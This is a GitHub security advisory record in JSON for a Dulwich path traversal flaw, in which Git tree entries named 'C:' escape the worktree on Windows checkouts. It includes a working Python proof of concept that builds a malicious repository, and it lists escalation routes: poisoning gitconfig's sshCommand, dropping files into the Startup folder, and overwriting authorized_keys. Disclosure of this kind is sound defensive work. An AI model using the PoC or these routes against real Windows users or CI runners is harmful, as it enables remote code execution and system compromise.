{"id":"GHSA-8mcx-5rqc-vhmf","summary":"Dulwich: Arbitrary File Write (RCE) on Windows via Unvalidated Drive Letters in Tree Paths","details":"### Affected files\n* `dulwich/index.py` (Methods: `validate_path_element_ntfs`, `_tree_to_fs_path`)\n* `dulwich/porcelain/__init__.py` (Method: `_checked_worktree_path`)\n\n### Description / Summary\nA High-severity Path Traversal vulnerability exists in Dulwich's checkout logic when running on Windows. The functions responsible for validating NTFS paths strictly reject `.git` variants, Alternate Data Streams (ADS), `git~1` short names, and reserved device names, but they completely fail to check for **DOS drive letter prefixes**.\n\nA malicious Git tree can contain an entry named `C:`. When Dulwich processes this tree on a Windows client, the string passes the `validate_path_element_ntfs` check. Later, `_tree_to_fs_path` passes this path to `os.path.join(root, b\"C:\\\\\\\\Users\\\\\\\\...\")`. \n\nOn Windows, if the second argument to `os.path.join` contains an absolute drive letter, the `root` path is completely discarded. As a result, Dulwich writes the repository file to the absolute path outside of the intended Git worktree.\n\nWhile the standard C `git` client explicitly blocks this via `has_dos_drive_prefix()` in `path.c`, Dulwich lacks this protection. Because Git trees are cross-platform, an attacker can author a malicious repository on Linux and wait for a Windows victim (or CI runner) to clone it.\n\n### Potential impact\n\nThis vulnerability allows an attacker to achieve **Arbitrary File Write**, which can trivially be escalated to **Remote Code Execution (RCE)** or total system compromise on the victim's Windows machine.\n\nAttack vectors include:\n1. **Git Config Poisoning (RCE):** Writing a malicious `C:\\\\Users\\\\\u003cvictim\u003e\\\\.gitconfig` file to set `core.sshCommand` to an arbitrary executable, granting RCE the next time the user interacts with Git.\n2. **Persistence (RCE):** Dropping a malicious executable into `C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\`.\n3. **SSH Key Overwrite:** Writing to `C:\\\\Users\\\\\u003cvictim\u003e\\\\.ssh\\\\authorized_keys` to compromise remote servers accessible by the victim.\n4. **CI/CD Compromise:** If a Windows-based CI/CD runner (e.g., GitHub Actions) automatically clones a malicious pull request, the runner is instantly compromised, potentially leaking repository secrets.\n\n### Proof of Concept (PoC)\nThe following Python script (runnable on Linux) generates a malicious Git repository containing a payload that targets Windows clients.\n\n```python\nfrom dulwich.objects import Blob, Tree, Commit\nfrom dulwich.repo import Repo\nimport os, tempfile\n\nrepo_path = tempfile.mkdtemp()\nrepo = Repo.init(repo_path)\n\n# 1. Build the payload blob.\nblob = Blob(); blob.data = b\"pwned-by-drive-letter\\\\n\"\nrepo.object_store.add_object(blob)\n\n# 2. Build the malicious tree hierarchy: C:/Users/victim/evil.txt\nevil_txt = Tree();   evil_txt[b\"evil.txt\"] = (0o100644, blob.id)\nrepo.object_store.add_object(evil_txt)\nvictim_dir = Tree(); victim_dir[b\"victim\"] = (0o040000, evil_txt.id)\nrepo.object_store.add_object(victim_dir)\nusers_dir  = Tree(); users_dir[b\"Users\"]   = (0o040000, victim_dir.id)\nrepo.object_store.add_object(users_dir)\n\n# VULNERABILITY: The \"C:\" directory bypasses validation\nc_drive    = Tree(); c_drive[b\"C:\"]        = (0o040000, users_dir.id)\nrepo.object_store.add_object(c_drive)\n\ncommit = Commit()\ncommit.tree = c_drive.id\ncommit.message = b\"add feature\"\ncommit.author = commit.committer = b\"attacker \u003ca@evil.example\u003e\"\ncommit.author_time = commit.commit_time = 1700000000\ncommit.author_timezone = commit.committer_timezone = 0\nrepo.object_store.add_object(commit)\nrepo.refs[b\"refs/heads/main\"] = commit.id\n\nprint(f\"Malicious repo created at {repo_path}\")\nprint(f\"Clone with: dulwich clone {repo_path} /target/win/worktree\")\n# Result: A Windows checkout of this commit writes the payload directly to C:\\\\Users\\\\victim\\\\evil.txt\n```","modified":"2026-10-02T19:30:04.527022433Z","published":"2026-10-02T19:14:21Z","database_specific":{"github_reviewed_at":"2026-10-02T19:14:21Z","nvd_published_at":null,"cwe_ids":["CWE-22"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/jelmer/dulwich/security/advisories/GHSA-8mcx-5rqc-vhmf"},{"type":"WEB","url":"https://github.com/jelmer/dulwich/commit/4ca77f9f470742ba246cd6fa07beb6d735045664"},{"type":"PACKAGE","url":"https://github.com/jelmer/dulwich"},{"type":"WEB","url":"https://github.com/jelmer/dulwich/releases/tag/dulwich-1.2.9"}],"affected":[{"package":{"name":"dulwich","ecosystem":"PyPI","purl":"pkg:pypi/dulwich"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.2.9"}]}],"versions":["0.0.1","0.1.0","0.1.1","0.10.0","0.10.1a","0.11.0","0.11.1","0.11.2","0.12.0","0.13.0","0.14.0","0.14.1","0.15.0","0.16.0","0.16.1","0.16.2","0.16.3","0.17.1","0.17.2","0.17.3","0.18.0","0.18.1","0.18.2","0.18.3","0.18.4","0.18.5","0.18.6","0.19.0","0.19.1","0.19.10","0.19.11","0.19.12","0.19.13","0.19.14","0.19.15","0.19.16","0.19.2","0.19.3","0.19.3a0","0.19.4","0.19.5","0.19.6","0.19.7","0.19.8","0.19.9","0.2.1","0.20.0","0.20.1","0.20.10","0.20.11","0.20.12","0.20.13","0.20.14","0.20.15","0.20.17","0.20.18","0.20.19","0.20.2","0.20.20","0.20.21","0.20.22","0.20.23","0.20.24","0.20.25","0.20.26","0.20.27","0.20.28","0.20.29","0.20.3","0.20.30","0.20.31","0.20.32","0.20.33","0.20.34","0.20.35","0.20.36","0.20.37","0.20.38","0.20.39","0.20.4","0.20.40","0.20.41","0.20.42","0.20.43","0.20.44","0.20.45","0.20.46","0.20.47","0.20.48","0.20.49","0.20.5","0.20.50","0.20.6","0.20.7","0.20.8","0.20.9","0.21.0","0.21.1","0.21.2","0.21.3","0.21.4","0.21.4.1","0.21.5","0.21.6","0.21.7","0.22.0","0.22.1","0.22.3","0.22.4","0.22.5","0.22.6","0.22.7","0.22.8","0.23.0","0.23.1","0.23.2","0.24.0","0.24.1","0.24.10","0.24.2","0.24.3","0.24.4","0.24.5","0.24.6","0.24.7","0.24.8","0.24.9","0.25.0","0.25.1","0.25.2","0.3.0","0.3.1","0.3.2","0.3.3","0.4.0","0.4.1","0.5.0","0.6.0","0.6.1","0.6.2","0.7.0","0.7.1","0.8.0","0.8.1","0.8.2","0.8.3","0.8.4","0.8.5","0.8.6","0.8.7","0.9.0","0.9.1","0.9.2","0.9.3","0.9.4","0.9.5","0.9.6","0.9.7","0.9.8","0.9.9","1.0.0","1.1.0","1.2.0","1.2.1","1.2.2","1.2.3","1.2.4","1.2.5","1.2.6","1.2.7","1.2.8"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-8mcx-5rqc-vhmf/GHSA-8mcx-5rqc-vhmf.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}]}